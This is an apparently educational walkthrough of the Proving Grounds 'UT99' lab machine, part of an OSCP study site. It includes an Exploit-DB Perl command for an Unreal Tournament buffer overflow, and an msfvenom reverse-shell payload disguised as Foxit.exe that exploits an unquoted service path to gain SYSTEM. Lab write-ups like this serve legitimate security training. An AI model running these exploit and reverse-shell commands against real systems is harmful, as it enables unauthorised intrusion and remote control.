📚
OSCP
  • Pentesting
  • Proving Grounds practice
    • Warm up
      • Windows
        • Kevin
        • Internal
        • Metallus
      • Linux
        • ClamAV
        • Exfiltrated
        • Twiggy
    • Get to work
      • Windows
        • Slort
        • Billyboss
        • Fish
        • UT99
        • AuthBy
        • Jacko
        • Shenzi
      • Linux
        • Dibble
        • Pelican
        • Sorcerer
        • Zino
        • Zenphoto
        • Snookums
        • Nibbles
        • Chatty
        • Banzai
    • Try harder
      • Windows
        • Meathead
      • Linux
        • Sirol
        • Peppo
        • Clyde
  • Buffer overflow
    • Buffer Overflow Methodology
    • TryHackMe Practice
      • Overflow1
      • Overflow2
      • Overflow3
      • Overflow4
      • Overflow5
      • Overflow6
      • Overflow7
      • Overflow8
      • Overflow9
      • Overflow10
  • Active Directory
    • AD Authentication
      • NTLM Authentication
      • Kerberos Authentication
    • TryHackMe Practice
      • Attacktive Directory
      • Roasted
      • RazorBlack
    • PG Practice
      • Hutch
      • Vault
      • Heist
Powered by GitBook
On this page
  • Information Gathering
  • Service Enumeration
  • FTP (Port 21)
  • HTTP (Port 80)
  • IRC Ports (6660-7000 and 7007)
  • Exploit
  • Privesc

Was this helpful?

  1. Proving Grounds practice
  2. Get to work
  3. Windows

UT99

Writeup for UT99 from offsec Proving Grounds

PreviousFishNextAuthBy

Last updated 3 years ago

Was this helpful?

Information Gathering

sudo ./nmapAutomator.sh 192.168.175.44 all

We also have IRC open ports at range 6660 to 7000 and 7007.

Service Enumeration

FTP (Port 21)

We tried various standard login credentials but all did not work.

HTTP (Port 80)

Looks like this is running Dragonfly CMS. Manual enumeration led us to conclude this is a dead end.

IRC Ports (6660-7000 and 7007)

We can install HexChat IRC Client using the following command:

apt-get install hexchat -y

We can add a new network and name it however we want. Next, click on the Edit to edit the parameters.

Here, add the IP and port number and click close.

Then, we can use any name we want and click connect.

Here, we click on the server option and click on ChannelList.

Under ChannelList, we can search for channels with users from 1-9999. And we see the channel ut99.

Upon connecting, we see that the Unreal Tournament 99 Game server is hosted on port 7778.

Exploit

perl 16145.pl 192.168.175.44 7778 192.168.49.175 80

Privesc

Systeminfo

We manually enumerate and find ftp directory.

Looks like this version of Foxit Reader is vulnerable to unquoted service path privesc. We can check if it is installed.

Looks like we have write permissions.

So let's generate our payload names Foxit.exe.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.49.175 LPORT=80 -f exe -o Foxit.exe

Then, we transfer our file to the target machine.

Next, we can reboot the machine. And we get SYSTEM.

shutdown -r -t 5 && exit

LogoUnreal Tournament - Remote Buffer Overflow (SEH)Exploit Database
LogoFoxit Reader 7.0.6.1126 - Unquoted Service Path Privilege EscalationExploit Database